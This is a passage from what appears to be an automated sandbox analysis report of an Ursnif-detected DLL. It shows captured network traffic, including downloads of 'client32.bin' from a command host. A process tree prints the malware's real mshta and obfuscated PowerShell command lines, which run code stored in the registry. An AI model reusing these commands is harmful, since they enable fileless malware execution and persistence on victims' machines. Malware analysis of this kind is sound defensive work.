                        2021-12-14 09:34:08 UTC1819INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                        Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                        2021-12-14 09:34:08 UTC1835INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                        Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                        2021-12-14 09:34:08 UTC1851INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                        Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                        2021-12-14 09:34:08 UTC1867INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                        Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                        2021-12-14 09:34:08 UTC1883INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                        Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        8192.168.2.54980579.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:08 UTC1890OUTGET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1891INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 1869
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=t7tkicntofbn6h47i9uut29i93; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1891INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        9192.168.2.54980679.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:08 UTC1890OUTGET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1893INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 1869
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=epkmjqjhsvjopqqq17rp3d0rs6; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1893INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: loaddll32.exe PID: 6360 Parent PID: 780

                        General

                        Start time:10:33:06
                        Start date:14/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\6.dll"
                        Imagebase:0x10c0000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:moderate

                        Analysis Process: cmd.exe PID: 6376 Parent PID: 6360

                        General

                        Start time:10:33:06
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                        Imagebase:0x150000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: regsvr32.exe PID: 6388 Parent PID: 6360

                        General

                        Start time:10:33:07
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\6.dll
                        Imagebase:0xdd0000
                        File size:20992 bytes
                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 6400 Parent PID: 6376

                        General

                        Start time:10:33:07
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                        Imagebase:0x11a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 6424 Parent PID: 6360

                        General

                        Start time:10:33:07
                        Start date:14/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
                        Imagebase:0x11a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: BackgroundTransferHost.exe PID: 5876 Parent PID: 792

                        General

                        Start time:10:33:35
                        Start date:14/12/2021
                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                        Wow64 process (32bit):false
                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                        Imagebase:0x7ff64e5e0000
                        File size:36864 bytes
                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Analysis Process: mshta.exe PID: 4036 Parent PID: 3472

                        General

                        Start time:10:34:12
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Analysis Process: mshta.exe PID: 1488 Parent PID: 3472

                        General

                        Start time:10:34:12
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Analysis Process: mshta.exe PID: 3696 Parent PID: 3472

                        General

                        Start time:10:34:12
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Analysis Process: powershell.exe PID: 7132 Parent PID: 4036

                        General

                        Start time:10:34:15
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        Analysis Process: powershell.exe PID: 7160 Parent PID: 3696

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        Analysis Process: powershell.exe PID: 7012 Parent PID: 1488

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: conhost.exe PID: 7136 Parent PID: 7132

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: conhost.exe PID: 5752 Parent PID: 7160

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: conhost.exe PID: 7048 Parent PID: 7012

                        General

                        Start time:10:34:16
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: mshta.exe PID: 496 Parent PID: 3472

                        General

                        Start time:10:34:20
                        Start date:14/12/2021
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                        Imagebase:0x7ff7f2bc0000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: powershell.exe PID: 3532 Parent PID: 496

                        General

                        Start time:10:34:23
                        Start date:14/12/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: conhost.exe PID: 4196 Parent PID: 3532

                        General

                        Start time:10:34:23
                        Start date:14/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: csc.exe PID: 6552 Parent PID: 7012

                        General

                        Start time:10:34:26
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
